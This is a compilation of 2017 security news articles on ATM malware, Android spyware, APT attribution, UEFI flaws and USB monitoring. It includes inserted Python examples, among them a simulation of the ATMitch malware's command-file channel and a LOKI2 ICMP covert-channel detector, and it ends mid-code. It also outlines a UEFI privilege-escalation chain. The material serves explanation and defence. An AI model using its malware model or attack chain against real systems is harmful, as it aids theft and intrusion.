While Kaspersky Lab did not officially accuse North Korea as being behind the attacks, the firm did display a strong case against the Hermit State. "This is the first time we have seen a direct link between Bluenoroff and North Korea," the company said. "Their activity spans from backdoors to watering hole attacks, and attacks on SWIFT servers in banks of South East Asia and Bangladesh Central Bank. Now, is it North Korea behind all the Bluenoroff attacks after all? As researchers, we prefer to provide facts rather than speculations. Still, seeing IP in the C2 log, does make North Korea a key part of the Lazarus Bluenoroff equation."

In a presentation at the Security Analyst Summit, Kamluk said that, while unlikely, another group could have invested a huge amount of money to frame North Korea. He also speculated that a third force could be involved to help North Korea from the outside.

Kaspersky has published a detailed report (PDF), which includes infiltration methods, their relation to attacks on SWIFT software, and insights on attribution. The report also includes Indicators of Compromise (IOC) and other data to help defenders detect possible Lazarus-related activity in their networks. They also produced a short video summarizing the activity of the group.



Hackers stole $800,000 from ATMs using Fileless Malware
4.4.2017 thehackernews Virus
Hackers targeted at least 8 ATMs in Russia and stole $800,000 in a single night, but the method used by the intruders remained a complete mystery with CCTV footage just showing a lone culprit walking up to the ATM and collecting cash without even touching the machine.
Even the affected banks could not find any trace of malware on their ATMs or backend network, or any sign of an intrusion. The only clue the unnamed bank's specialists found on the ATM's hard drive was two files containing malware logs.
The log files included the two process strings containing the phrases: "Take the Money Bitch!" and "Dispense Success."
This small clue was enough for the researchers from the Russian security firm Kaspersky, who have been investigating the ATM heists, to find malware samples related to the ATM attack.
In February, Kaspersky Labs reported that attackers managed to hit over 140 enterprises, including banks, telecoms, and government organizations, in the US, Europe and elsewhere with the 'Fileless malware,' but provided few details about the attacks.
According to the researchers, the attacks against banks were carried out using a Fileless malware that resides solely in the memory (RAM) of the infected ATMs, rather than on the hard drive.
Now during the Kaspersky Security Analyst Summit in St. Maarten on Monday, security researchers Sergey Golovanov and Igor Soumenkov delved into the ATM hacks that targeted two Russian banks, describing how the attackers used the fileless malware to gain a strong foothold into bank's systems and cash out, ThreatPost reports.
Mysterious ATM Hack Uncovered by Researchers
Dubbed ATMitch, the malware — previously spotted in the wild in Kazakhstan and Russia — is remotely installed and executed on ATMs via its remote administration module, which gives hackers the ability to form an SSH tunnel, deploy the malware, and then send the command to the ATM to dispense cash.
Since fileless malware uses the existing legitimate tools on a machine, so that no malware gets installed on the system, the ATM treats the malicious code as legitimate software, allowing remote operators to send the command at the time when their associates are present at the infected ATM to pick up the money.
This ATM theft takes just a few seconds to complete, without the operator physically going near the machine. Once the ATM has been emptied, the operator 'signs off,' leaving very little trace, if any, of the malware.
However, this remote attack is possible only if an attacker first tunnels in through the bank's back-end network, a process that requires far more sophisticated network intrusion skills.
A Very Precise Form of Physical Penetration
Since opening the ATM's panel directly could also trigger an alarm, attackers switched to a very precise form of physical penetration: Drilling a golf-ball sized hole in ATM's front panel to gain direct access to the cash dispenser panel using a serial distributed control (SDC RS485 standard) wire.
This method was revealed when Golovanov and Soumenkov were able to reverse engineer the ATM attack after police arrested a man dressed as a construction worker while he was drilling into an ATM to inject malicious commands in the middle of the day to trigger the machine’s cash dispenser.
The suspect was arrested with a laptop, cables, and a small box. Although the researchers did not name the affected ATM manufacturer or the banks, they warn that ATM burglars have already used the ATM drill attack across Russia and Europe.
In fact, this technique also affects ATMs around the world, leaving them vulnerable to having their cash drawn out in a matter of minutes.
Currently, the group or country behind these ATM hacks is unknown, but coding present in the attack contains references to the Russian language, and the tactics, techniques, and procedures bear a resemblance to those used by bank-robbing gangs Carbanak and GCMAN.
Fileless malware attacks are becoming more frequent. Just last month, researchers found a new fileless malware, dubbed DNSMessenger, that uses DNS queries to conduct malicious PowerShell commands on compromised computers, making the malware difficult to detect.


Google just discovered a dangerous Android Spyware that went undetected for 3 Years
4.4.2017 thehackernews Android
An Android version of one of the most sophisticated mobile spyware tools has been discovered that remained undetected for at least three years thanks to its smart self-destruction capabilities.
Dubbed Chrysaor, the Android spyware has been used in targeted attacks against activists and journalists mostly in Israel, but also in Georgia, Turkey, Mexico, the UAE and other countries.
Chrysaor espionage malware, uncovered by researchers at Lookout and Google, is believed to have been created by the same Israeli surveillance firm, NSO Group Technologies, that was behind the Pegasus iOS spyware initially detected in targeted attacks against human rights activists in the United Arab Emirates last year.
NSO Group Technologies is believed to produce the most advanced mobile spyware on the planet and to sell it to governments and law enforcement agencies worldwide, as well as to dictatorial regimes.

The newly discovered Chrysaor spyware has been found installed on fewer than three-dozen Android devices, although researchers believe that there were more victims before its detection, who most likely have either formatted or upgraded their phones.
"Although the applications were never available in Google Play, we immediately identified the scope of the problem by using Verify Apps," Google said in its own blog post published Monday.
"We've contacted the potentially affected users, disabled the applications on affected devices, and implemented changes in Verify Apps to protect all users."

Just like Pegasus for iOS, Chrysaor for Android offers a wide array of spying functions, including:
Exfiltrating data from popular apps including Gmail, WhatsApp, Skype, Facebook, Twitter, Viber, and Kakao.
Controlling the device remotely via SMS-based commands.
Recording live audio and video.
Keylogging and screenshot capture.
Disabling system updates to prevent vulnerability patching.
Spying on contacts, text messages, emails and browser history.
Self-destructing to evade detection.
"If it feels like it's going to be found, it removes itself," said Lookout Security researcher Michael Flossman. "That's why it took so long to find these samples."
Researchers believe that the Chrysaor APK was also distributed via SMS-based phishing messages, just as Pegasus was on iOS.
While Pegasus leveraged three then-zero-day vulnerabilities in Apple's iOS to jailbreak targeted devices, Chrysaor uses Framaroot, a well-known Android rooting tool, to root the device and gain full control over the operating system.
Since the known Chrysaor samples date back to 2014, Lookout warned that NSO Group may since have discovered Android zero-day vulnerabilities and deployed them in newer versions of Chrysaor.
Lookout has also published full technical details in its report [PDF] titled "Pegasus for Android: Technical Analysis and Findings of Chrysaor"; see the report for a more detailed explanation of the malware.
How to protect your Android device: Google recommends installing apps only from reputable sources, protecting the device with a PIN or password lock, enabling the 'Verify Apps' feature in settings, and keeping the device up to date with the latest security patches.


Malware Allows Remote Administration of ATMs

4.4.2017 securityweek Virus
A recently discovered piece of malware allows attackers to remotely control compromised ATMs (automated teller machines), Kaspersky Lab reveals.

The threat was discovered after a Russian bank was hit by a targeted attack in which cybercriminals gained control of ATMs and uploaded malware to them. The attackers removed the malware after the heist, leaving researchers without an executable to analyze, but the bank's forensic team recovered the malware's logs and some file names, which Kaspersky researchers were able to examine.

The files were recovered by the bank’s forensic team, which provided the security researchers with two text files (located at C:\Windows\Temp\kl.txt and C:\logfile.txt), and the names of two deleted executables (C:\ATM\!A.EXE and C:\ATM\IJ.EXE). However, the contents of the exe files couldn’t be retrieved, Kaspersky notes.

Based on the information retrieved from the log files, the researchers created a YARA rule to find a sample, and eventually found one, in the form of “tv.dll”. This in turn led to the discovery of ATMitch, a piece of malware that essentially provides attackers with the ability to remotely administrate ATMs.

The malware is installed and executed via Remote Desktop Protocol (RDP) access to the ATM from within the bank's network. Once on the machine, it looks for a file named "command.txt" in the same directory as the malware itself; this file contains a list of one-character commands: ‘O’ – Open dispenser; ‘D’ – Dispense; ‘I’ – Init XFS; ‘U’ – Unlock XFS; ‘S’ – Setup; ‘E’ – Exit; ‘G’ – Get Dispenser id; ‘L’ – Set Dispenser id; and ‘C’ – Cancel.

After executing a command, the malware writes the result to its log file and removes "command.txt" from the ATM's hard drive. ATMitch makes no apparent attempt to hide itself on the system. It controls the ATM through the standard XFS (eXtensions for Financial Services) library, meaning it can run on any ATM that supports XFS.
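To make the command channel concrete, here is a model of it as an added example written for this page; it is not Kaspersky's code or the malware itself. The command letters are the ones listed above; everything else (the dispenser state machine, the per-command cash limit, the log format, the temporary working directory) is an assumption.

```python
"""Model of ATMitch's file-based command channel as the article describes it:
the operator drops a "command.txt" of one-character commands next to the
malware, which executes them, logs the results and deletes the file.
Added example for this page, not Kaspersky's code. The dispenser is a pure
Python stand-in for the XFS-controlled hardware, and the ordering it enforces
(Init and Unlock before Open/Dispense, a per-command cash limit) is assumed."""
import os
import tempfile

# Command letters and meanings exactly as listed in the article.
COMMANDS = {
    "O": "open_dispenser", "D": "dispense", "I": "init_xfs", "U": "unlock_xfs",
    "S": "setup", "E": "exit", "G": "get_dispenser_id", "L": "set_dispenser_id",
    "C": "cancel",
}


class ModelDispenser:
    """Stand-in for the cash dispenser; no real XFS calls are made."""

    def __init__(self, cash=5000):
        self.initialised = False
        self.unlocked = False
        self.cash = cash
        self.dispenser_id = 0

    def init_xfs(self):
        self.initialised = True
        return "XFS initialised"

    def unlock_xfs(self):
        if not self.initialised:
            raise RuntimeError("XFS not initialised")
        self.unlocked = True
        return "XFS unlocked"

    def open_dispenser(self):
        if not self.unlocked:
            raise RuntimeError("dispenser locked")
        return "dispenser opened"

    def dispense(self):
        if not self.unlocked:
            raise RuntimeError("dispenser locked")
        amount = min(self.cash, 1000)       # assumed per-command limit
        self.cash -= amount
        return f"dispensed {amount}"

    def setup(self):
        return "setup done"

    def exit(self):
        return "exit"

    def get_dispenser_id(self):
        return f"id={self.dispenser_id}"

    def set_dispenser_id(self):
        self.dispenser_id += 1
        return f"id set to {self.dispenser_id}"

    def cancel(self):
        return "cancelled"


def process_command_file(workdir, dispenser, log_name="logfile.txt"):
    """One polling pass: read command.txt from the malware's own directory,
    run each command, append the results to the log, delete command.txt.
    Returns the log lines written in this pass."""
    cmd_path = os.path.join(workdir, "command.txt")
    if not os.path.exists(cmd_path):
        return []
    with open(cmd_path, encoding="ascii") as fh:
        letters = [c for c in fh.read() if not c.isspace()]
    lines = []
    for letter in letters:
        name = COMMANDS.get(letter.upper())
        if name is None:
            lines.append(f"{letter}: unknown command")
            continue
        try:
            lines.append(f"{letter}: {getattr(dispenser, name)()}")
        except RuntimeError as err:
            lines.append(f"{letter}: error: {err}")
    with open(os.path.join(workdir, log_name), "a", encoding="ascii") as fh:
        fh.writelines(line + "\n" for line in lines)
    os.remove(cmd_path)          # the article: command.txt is removed after execution
    return lines


def run_scenario(script="IUDDQE"):
    """Drop a constructed command file in a temp dir, process it once and
    return (log lines, cash left, whether command.txt was deleted)."""
    workdir = tempfile.mkdtemp()
    dispenser = ModelDispenser()
    with open(os.path.join(workdir, "command.txt"), "w", encoding="ascii") as fh:
        fh.write(script)
    lines = process_command_file(workdir, dispenser)
    deleted = not os.path.exists(os.path.join(workdir, "command.txt"))
    return lines, dispenser.cash, deleted


if __name__ == "__main__":
    for entry in run_scenario()[0]:
        print(entry)
```

Because the only on-disk traces are a short-lived command.txt and an appended log, host-side detection on the ATM has to key on file creation in the malware's directory, or on the RDP session that delivers it, rather than on a persistent executable.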

The !A.exe and IJ.exe executables, which might be the installer and uninstaller of the malware, couldn’t be retrieved. “tv.dll”, the researchers say, contained one Russian-language resource.

This attack, Kaspersky notes, was connected to a fileless attack detailed in February 2017, which targeted numerous organizations worldwide. The attack, Morphisec revealed last month, was tied to an attack framework used in a series of other incidents detailed by Cisco and FireEye as well.


Apple Updates iOS to Patch Wi-Fi Vulnerability

4.4.2017 securityweek iOS
Apple has released an emergency security update for its iOS operating system to address a serious vulnerability affecting the Wi-Fi component.

According to the tech giant, the flaw is a stack-based buffer overflow that allows an attacker who is within range to execute arbitrary code on the Wi-Fi chip.

The security hole, tracked as CVE-2017-6975, has been addressed with the release of iOS 10.3.1 through improved input validation, Apple said. The update is available for iPhone 5 and later, iPod touch 6th generation and later, and iPad 4th generation and later.

9to5 Mac reported that while iOS 10.3 dropped support for 32-bit devices, the latest update reintroduces support for these systems.

The vulnerability was identified and reported by Gal Beniamini of Google Project Zero, which typically discloses the details of flaws found by its researchers after 90 days.

In a security advisory submitted to the Full Disclosure mailing list, Apple advised users to install the update immediately if possible, and pointed out that the update is only available through iTunes and the Software Update utility on the iOS device; the update will not show up on the Apple Downloads website or in the computer's Software Update application.

iOS 10.3.1 was released just one week after Apple announced the general availability of iOS 10.3, which brings many new features and patches for nearly 90 vulnerabilities. Roughly 30 of these security holes were reported to Apple by Google Project Zero researchers.


It's Official: McAfee Breaks Away from Intel With New Logo

4.4.2017 securityweek IT
McAfee Spins Out from Intel as a New Independent Company With Refreshed Logo

McAfee, one of the best-known and most persistent brands in cybersecurity, has re-emerged from Intel as an independent company. Intel acquired it for $7.68 billion in 2010. In 2014, Intel announced the McAfee brand would be phased out and replaced by Intel Security, although the red shield logo was retained. In September 2016, Christopher Young, SVP and GM of the Intel Security Group, announced that McAfee would again be an independent company -- 49% owned by Intel and 51% owned by TPG. The transaction values the company at $4.2 billion.

The spin-out is now complete, and McAfee is again an independent company. In this incarnation the name is retained, but the original red shield logo is replaced by a stylized red shield accompanied by the tagline 'Together is power.' Chris Young is the CEO.

The McAfee brand has proved remarkably resilient over the years. It was one of the earliest security brands, and has survived the disdain of its original developer, the somewhat maverick John McAfee. But greater challenges lie ahead: to really succeed, Chris Young will need to transform an image associated with early, signature-based, legacy anti-virus into something more contemporary.


The original anti-virus companies -- almost all now more than just AV -- were caught napping by the second-generation AV companies, which marketed themselves as machine-learning (ML) endpoint protection firms. The general perception is that machine learning and artificial intelligence are the way forward, as evidenced by another legacy firm, Sophos, buying ML firm Invincea. Young will need to transform public perception of an old brand into something more dynamic and forward-thinking.

McAfee's plan is to achieve this by evolution rather than revolution. There are no major new security initiatives announced today, although a raft of new products were announced at the end of 2016. "We will continue to be very focused on our customers. The strategy outlined at our annual security conference, FOCUS 16, will be the same. We are focused on end-to-end solutions and pivoting to the cloud," says the company.

McAfee's vision is to accelerate its existing strategy to drive cybersecurity towards true automation, not just for itself but across the whole industry. Its belief is that it can better focus on this strategy as an independent company.

"Security is the fastest-growing, but also the most fragmented and least profitable of all parts of IT," corporate VP of global products at Intel Security, Brian Dye, told SecurityWeek. "That tells us we're doing something fundamentally wrong." He believes that automation is the solution to weak security, fragmentation, and profitability. "We want to drive a level of automation across the industry and bring that level of automation into our own portfolio -- being standalone lets us focus on that mission wholeheartedly."

He describes McAfee's path as an evolution from integration, "which is what we've done historically with ePolicy Orchestrator's single management pane of glass for the SOC;" to automation, "which is what we are doing with the Data Exchange Layer (DXL);" and ultimately on towards full orchestration, "which will bring together and automate more and more complex and sophisticated workflows."

Key to this evolution is the big data threat intelligence derived from the telemetry of millions of customers on endpoints and corporate servers across the globe driving automation, through machine learning and artificial intelligence, across the DXL fabric. The aim is to move towards full closed loop zero human touch automation wherever possible; and improved human/machine teaming elsewhere.

DXL allows the sharing of actionable threat intelligence not just across the McAfee portfolio, but also between the products of partners in the McAfee Security Innovation Alliance. Dye believes that increasing and improving machine learning will allow full automation across the whole SOC; and that DXL will provide the backbone of that automation.

But he sees this as not merely a vision but a necessity for the future. "The only way we will be able to adapt to the changes that are happening, from the cloud to edge computing and the IoT, is if we automate the security tasks across the industry," he told SecurityWeek. "We have to do that to free up the people and bandwidth to allow the implementation of these changes and new technologies. When new technologies arrive, you simply plug them into the DXL fabric. Change becomes an accelerator not an inhibitor; and it is our belief that this is required for industry to be successful."

Through DXL and threat intelligence, he said, "we can drive the rebirth of one of cybersecurity's best known brands."


Honeywell SMX Protects Industrial Sites From USB Threats

4.4.2017 securityweek Cyber

Honeywell announced on Tuesday the launch of a new product designed to protect industrial facilities from USB-borne threats by providing a simple way for organizations to track the removable media devices connected to their systems.

The new product, Secure Media Exchange (SMX), has two main components: an intelligence gateway and a piece of software installed on endpoints.

When a contractor wants to use a USB drive in a protected organization, they need to check the device at the intelligence gateway, a touchscreen system that can reside at the physical front desk or another location where it can be easily accessed by visitors.

Before entering the facility, users are prompted to complete a check-in procedure by connecting their USB drive to the gateway. The files stored on the drive are verified by Honeywell’s Advanced Threat Intelligence Exchange (ATIX) cloud service, which relies on both signatures and behavior analysis (i.e. running suspicious files in a special ICS sandbox) to identify known and zero-day threats.

According to Honeywell, the check-in process typically takes as long as a regular malware scan, depending on the size of the drive and the number of files. The ATIX service checks for known good and known bad files to expedite the process, and the scan can also be sped up by quarantining all files except for the ones that need to be used.

Once the process has been completed, the user can take the USB device and attach it to any endpoint within the organization. Devices that have not been checked by the gateway (e.g. a contractor wants to connect their smartphone for charging) will be blocked from using the endpoint's USB port.

The SMX client software running on endpoints will ensure that access to the files on a device is restricted if the check-in process has not been completed or if signs of tampering are detected.

In order to prevent malware from entering an organization, suspicious files are quarantined inside a password-protected archive file. Administrators can also block specific file types from getting into the facility.

When a contractor leaves the site, they will need to complete a check-out process at the SMX gateway. Failure to complete the process can result in the inability to access the files on the removable media device from a different computer. However, Honeywell says there are mechanisms in place to allow users to conduct the check-out process at a later time (e.g. a contractor could forget to complete the process when leaving an offshore platform via helicopter).

In addition to giving the user access to their files, the check-out process scans the device once again for malware, in an effort to identify any threats that may already be inside the plant.

There have been several high-profile incidents where USB drives had been used to plant malware on an industrial network, including the notorious Stuxnet attacks and a 2013 incident that affected two US power plants.

Malware delivered via removable media is considered one of the biggest threats to industrial environments, but this type of storage is often required to perform updates. The risk is not easy to address, especially since, according to Honeywell, on average, an organization has seven different brands of control systems that require USB updates, and the number of daily contractors on site ranges between 25 and 150.


IAAF Says Russia-Linked Hackers Accessed Medical Records

4.4.2017 securityweek Hacking

The International Association of Athletics Federations (IAAF) revealed on Monday that athletes' medical records were accessed in an attack the organization believes was carried out by the Russia-linked cyber espionage group known as Fancy Bear.

Fancy Bear is also known as APT28, Pawn Storm, Strontium, Sofacy, Sednit and Tsar Team. The group is said to be responsible for many high-profile attacks, including the recent U.S. election hacks.

The IAAF, which is based in Monaco, said it learned of the breach after it hired incident response firm Context Information Security in January to conduct a technical investigation. Investigators found signs of unauthorized remote access on February 21, when they discovered metadata on athletes' Therapeutic Use Exemption (TUE) applications stored in a newly created file.

The breach impacts athletes who have applied for TUEs since 2012. Affected individuals have been contacted by the IAAF.

It is unclear whether the attackers managed to exfiltrate the information they collected, but the IAAF believes the newly created file is a strong indication of what they were after. The IAAF is confident the threat actor no longer has access to its networks following clean-up efforts assisted by Context, the UK National Cyber Security Centre (NCSC), and the Agence Monégasque de Sécurité Numérique (Monaco AMSN).

This is not the first time Fancy Bear has been accused of targeting an athletic organization. Last year, the World Anti-Doping Agency (WADA) said the hackers had stolen sensitive athlete data, including medical test results and TUEs.

Researchers linked the attack on WADA to the Fancy Bear cyberspies, but a group calling itself “Fancy Bears,” claiming to be affiliated with the Anonymous hacktivist movement, also took responsibility for the breach and leaked some of the stolen files.

In the WADA attack, hackers gained unauthorized access to the Anti-Doping Administration and Management System (ADAMS) after using a fake website to phish credentials. In the case of IAAF, there is no information on how the attackers may have gained access to the organization’s systems.


Joining the dots between the ancient Moonlight Maze espionage campaigns and the Turla APT
4.4.2017 securityaffairs Virus

Experts at Kaspersky presented the findings of their research that definitively connect the Moonlight Maze cyber espionage campaigns to the Turla APT group.
One year ago, the researcher Thomas Rid at the Security Analyst Summit disclosed the alleged links between the Moonlight Maze cyber espionage operation of mid 1990s and the Turla APT.

Today at the annual Kaspersky Lab conference, Rid, along with security experts Costin Raiu and Juan Andres Guerrero-Saade, presented the findings of their research that definitively connect the Moonlight Maze cyber espionage campaigns to the Russian APT group.


Moonlight Maze is the code name assigned to one of the first detected cyber espionage campaigns that targeted a number of critical U.S. government agencies, including the Pentagon, NASA and the Department of Energy.

Threat actors behind the Moonlight Maze were focused on UNIX systems such as Sun Solaris, while the Turla APT is more specialized in attacks on Windows systems.

The researchers speculated that the missing link between the two operations lies in the Penquin Turla attacks, which date back to 2011 and were spotted by Kaspersky Lab in 2014. Penquin Turla was designed to compromise Linux machines with a backdoor based on the open-source LOKI2 backdoor released in Phrack magazine in September 1997.

“The revelation that the Moonlight Maze attacks were dependent on a Solaris/*NIX toolkit and not a Windows one as is the case with most of Turla, actually revived our hopes.” reads the analysis published by Kaspersky. “In 2014, Kaspersky announced the discovery of Penquin Turla, a Linux backdoor leveraged by Turla in specific attacks. We turned our attention once again to the rare Penquin samples and noticed something interesting: the code was compiled for the Linux Kernel versions 2.2.0 and 2.2.5, released in 1999. Moreover, the statically linked binaries libpcap and OpenSSL corresponded to versions released in the early 2000s. Finally, despite the original assessment incorrectly surmising that Penquin Turla was based on cd00r (an open-source backdoor by fx), it was actually based on LOKI2, another open-source backdoor for covert exfiltration written by Alhambra and daemon9 and released in Phrack in the late 1990s.”

Guerrero-Saade explained that of the 45 Moonlight Maze binaries that were detected by experts at Kaspersky, nine of them were examples of the LOKI2 backdoor.

This is remarkable: it shows that a 20-year-old tool is still effective against high-value targets.

“This speaks to the state of Linux security and the lack of awareness—and even hubris—that goes into some Linux system administration, an ill-advised approach for government and corporate settings,” Guerrero-Saade said. “These guys (Moonlight Maze) didn’t have to play the cat-and-mouse game with antivirus companies or rewrite their toolkit 30 times to get it through VirusTotal and still hope it works. It’s terrifying to see that the evolved Penquin Turla samples are based on 20 year old code and still linked to libraries built in 1999-2004 and they still work on modern machines. You’d never see that on Windows.”

In short, the link between Moonlight Maze's early UNIX and Solaris toolkit and modern Turla Windows operations is the LOKI2-based backdoor used in the Penquin Turla attacks.
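Given that the LOKI2 lineage still works on modern Linux hosts, the practical question for a defender is how its traffic looks on the wire. The detector below is an added example written for this page, not Kaspersky's or the Moonlight Maze toolkit. The one thing it assumes about LOKI2 comes from its Phrack release rather than from this article: the data rides in the payload of ICMP echo request/reply packets (LOKI2 also has a UDP/53 mode, not handled here). The sample packets are constructed inline.

```python
"""Heuristic detector for LOKI2-style ICMP covert channels. Added example
for this page, not Kaspersky's or the Moonlight Maze toolkit. The only thing
it assumes about LOKI2 is what its Phrack release documents: the data rides
in the payload of ICMP echo request/reply packets (the UDP/53 mode is not
handled). Packets here are constructed inline; in practice you would feed
it ICMP datagrams pulled from a pcap."""
import math
import struct
from collections import Counter

ICMP_ECHO_REPLY, ICMP_ECHO_REQUEST = 0, 8
# Default payloads of the two common ping implementations.
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"   # ping.exe, 32 bytes
LINUX_PING_TAIL = bytes(range(0x10, 0x38))                   # iputils on 64-bit: 16-byte timeval + 0x10..0x37


def shannon_entropy(data):
    """Bits per byte: 0.0 for empty/constant data, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_icmp(packet):
    """Split a raw ICMP datagram into (type, code, identifier, sequence, payload)."""
    if len(packet) < 8:
        raise ValueError("truncated ICMP header")
    icmp_type, code, _checksum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return icmp_type, code, ident, seq, packet[8:]


def build_echo(ident, seq, payload, reply=False):
    """Construct an ICMP echo datagram (checksum left at zero; irrelevant for parsing)."""
    icmp_type = ICMP_ECHO_REPLY if reply else ICMP_ECHO_REQUEST
    return struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload


def looks_like_ping(payload):
    return payload == WINDOWS_PING_PAYLOAD or (len(payload) == 56 and payload[16:] == LINUX_PING_TAIL)


def classify(packet, entropy_threshold=6.0):
    """Return ('not-echo' | 'ping' | 'suspicious', reason)."""
    icmp_type, _code, _ident, _seq, payload = parse_icmp(packet)
    if icmp_type not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY):
        return "not-echo", ""
    if looks_like_ping(payload):
        return "ping", ""
    ent = shannon_entropy(payload)
    if ent >= entropy_threshold:                          # encrypted/compressed tunnel data
        return "suspicious", f"high-entropy payload ({ent:.2f} bits/byte, {len(payload)} bytes)"
    if payload and all(32 <= b < 127 for b in payload):   # cleartext command output
        return "suspicious", f"printable text in echo payload: {payload[:24]!r}"
    return "ping", ""


def scan(packets):
    """Classify a batch and return only the suspicious ones as (index, reason)."""
    return [(i, reason) for i, pkt in enumerate(packets)
            for verdict, reason in (classify(pkt),) if verdict == "suspicious"]


# Constructed sample traffic: two normal pings, then two LOKI2-like packets.
SAMPLE = [
    build_echo(0x1234, 1, WINDOWS_PING_PAYLOAD),
    build_echo(0x1234, 2, b"\x00" * 16 + LINUX_PING_TAIL),
    build_echo(0xF001, 7, b"uid=0(root) gid=0(root)", reply=True),
    build_echo(0xF001, 8, bytes((i * 73 + 41) % 256 for i in range(128))),
]

if __name__ == "__main__":
    for index, why in scan(SAMPLE):
        print(f"packet {index}: {why}")
```

The two heuristics cover the two ways the channel shows up: encrypted tunnel data looks like random bytes (entropy near 8 bits per byte, far above any ping pattern), while an unencrypted session leaks command output as printable text in a place where no ping implementation puts text. Tune the threshold against your own baseline; a 32-byte Windows ping payload scores well under 5 bits.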

The investigation took an intriguing and lucky turn: the researchers found the original artifacts thanks to a system administrator in the U.K. named David Hedges, who, in cooperation with the London Metropolitan Police and the FBI, had logged every keystroke on a server targeted by Moonlight Maze. The researchers were able to find Hedges because of a redaction error in an FBI FOIA release.

Hedges confirmed that the server was still running and provided access to logs containing evidence of the Moonlight Maze operation, along with a toolkit of 43 binaries used in the attacks.

The investigation also turned up further details on a little-known operation codenamed 'Storm Cloud', whose toolkit was an evolution of the one used by the same Moonlight Maze threat actors.

Moonlight Maze became public in 1999 and Storm Cloud four years later; in that case too, the code was based on the LOKI2 backdoor.

“We’re really trying to push the crowdsourcing element to this,” Guerrero-Saade said. “Thomas’ first talk helped us find David and more about Moonlight Maze. We need help. We need another David Hedges, someone with access to the Storm Cloud artifacts to really solidify this link.”


UEFI Vulnerabilities allow to fully compromise Gigabyte Mini PCs
4.4.2017 securityaffairs Vulnerebility

Experts at Cylance disclosed two UEFI flaws that can be exploited by attackers to install a backdoor on some Gigabyte BRIX mini PCs.
Experts at security firm Cylance have disclosed two UEFI vulnerabilities that can be exploited by attackers to install a backdoor on some Gigabyte BRIX mini PCs.

The experts tested the latest firmware for the GB-BSi7H-6500 and GB-BXi7-5775 mini PCs and found that some protection features are missing, which would allow an attacker to exploit the flaws to deliver, for example, a ransomware payload that prevents the system from booting.

“These new mitigations, based on virtualization technologies in Windows 10, are vulnerable to UEFI-based attacks from System Management Mode (SMM). Because SMM allows direct access to physical memory, it’s possible to bypass the virtualization layer of isolation (Intel VT-x). This kind of attack is already discussed in detail in ‘Attacking Hypervisors via Firmware and Hardware’.” reads the analysis published by Cylance.

One of the issues, tracked as CVE-2017-3197, lies in an SMI handler and can be exploited to execute code in System Management Mode (SMM). The American Megatrends (AMI) firmware running on the affected devices normally provides write-protection mechanisms for the firmware flash, but Gigabyte shipped the devices with these protections disabled.

The flaw is dangerous because it sits at the end of an otherwise conventional attack chain: the attacker first gains code execution by tricking the victim into visiting a specially crafted website or opening a weaponized document, elevates privileges to kernel mode, and then exploits the SMI vulnerability to execute code in SMM and write directly to the flash memory.

The attack chain described by the experts:

1. User-mode execution (ring 3)
2. Kernel mode execution (ring 0)
3. SMM execution (ring -2)
4. SPI Flash Write

“The attacker gains user-mode execution through an application vulnerability such as a browser exploit or a malicious Word document with an embedded script. From there, the attacker elevates his privileges by exploiting the kernel or a kernel module such as Capcom.sys to execute code in ring 0. A vulnerable SMI handler allows the attacker to execute code in SMM mode (ring -2) where he finally can bypass any write protection mechanisms and install a backdoor into the system’s firmware.”


The second vulnerability, tracked as CVE-2017-3198, stems from the fact that the Gigabyte UEFI does not cryptographically verify the authenticity and integrity of a firmware update, so an attacker who has gained access to the system can push malicious firmware onto the device.

“The GIGABYTE UEFI firmware does not cryptographically validate images prior to updating the system firmware. Additionally, the firmware updates are served over HTTP without checksums for verifying authenticity.” reads a blog post published by Cylance.

“An attacker can use the provided AMI Firmware Update (AFU) utility to write arbitrary code to the firmware,” the post continues.

“As mentioned in our previous post, successful infection at such a low level has the potential to be disastrous. UEFI rootkits and ransomware, as we demonstrated at both RSA Conference and BlackHat Asia, could provide attackers with a degree of control that is difficult, if not near-impossible, to detect or rectify.” continues a blog post published by Cylance.

The flaws were discovered just before Christmas and reported to Gigabyte in mid-January. The company has developed a firmware update, version vF7, that is currently in testing and will be released soon. Unfortunately, the update will only be available for the GB-BSi7H-6500, because the GB-BXi7-5775 has reached end of life.


New "USB Canary" Keeps Close Watch on USB Ports

3.4.2017 securityweek IT
New "USB Canary" Tool for Linux Monitors USB Ports 24/7

A new open source tool can provide Linux users with the ability to receive an alert any time someone attempts to plug a device into one of their machine’s USB ports.

Dubbed USB Canary, the tool uses pyudev to monitor USB devices and can be set to do so either at all times or only when the computer is locked. More importantly, the tool can be configured to alert users when someone is tampering with their USB ports. It can either send an SMS via the Twilio API, or send a Slack notification via an inbuilt Slack bot.

Recently released as open source, the tool aims to overcome a shortcoming of other monitoring tools, which report USB-port incidents only after login; USB Canary keeps an eye on the system at all times while it is unattended.

According to the researcher, who goes by the online handle errbufferoverfl, although the tool is available only for Linux at the moment, Windows and macOS versions are also planned (but no specific details on them have been revealed so far).

The tool is written in Python. Its author explains that it was initially created as a personal utility while he was between jobs, and that it relies on third-party libraries such as pyudev.

Users can configure the tool to detect the type of screensaver running on the computer (it can detect XScreenSaver and gnome-screensaver, but can be used with unsupported screensavers as well), to turn a “paranoid” mode on, and set the notifications to arrive either via Twilio or Slack.

“Paranoid mode is also suitable for people who want to monitor if their servers have had USBs plugged into them, although I haven't tested them on Linode, Amazon Web Services, or Digital Ocean it is suitable for those with physical servers that may need this sort of monitoring,” the researcher notes.
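To show how the alerting decision in such a tool fits together, here is an added example written for this page, not the USB Canary project's code. The policy (lock-aware alerting, a paranoid mode, an allow-list keyed on udev's ID_VENDOR_ID/ID_MODEL_ID properties) is exercised with constructed events; the lock probe via xscreensaver-command, the hostname and the print-based notifier are stand-ins, and main() shows the real pyudev hook.

```python
"""Alerting policy of a USB Canary-style monitor. Added example written for
this page, not the USB Canary project's code. The decision logic is plain
Python so it can be exercised with constructed events; main() shows the real
pyudev hook such a tool is built on. The lock probe (xscreensaver-command),
the hostname and the notifier (print) are stand-ins."""
import subprocess
from dataclasses import dataclass, field


@dataclass
class UsbEvent:
    action: str            # "add" or "remove", as udev reports it
    vendor_id: str = ""    # udev property ID_VENDOR_ID
    model_id: str = ""     # udev property ID_MODEL_ID
    model: str = ""        # udev property ID_MODEL (human readable)


@dataclass
class CanaryPolicy:
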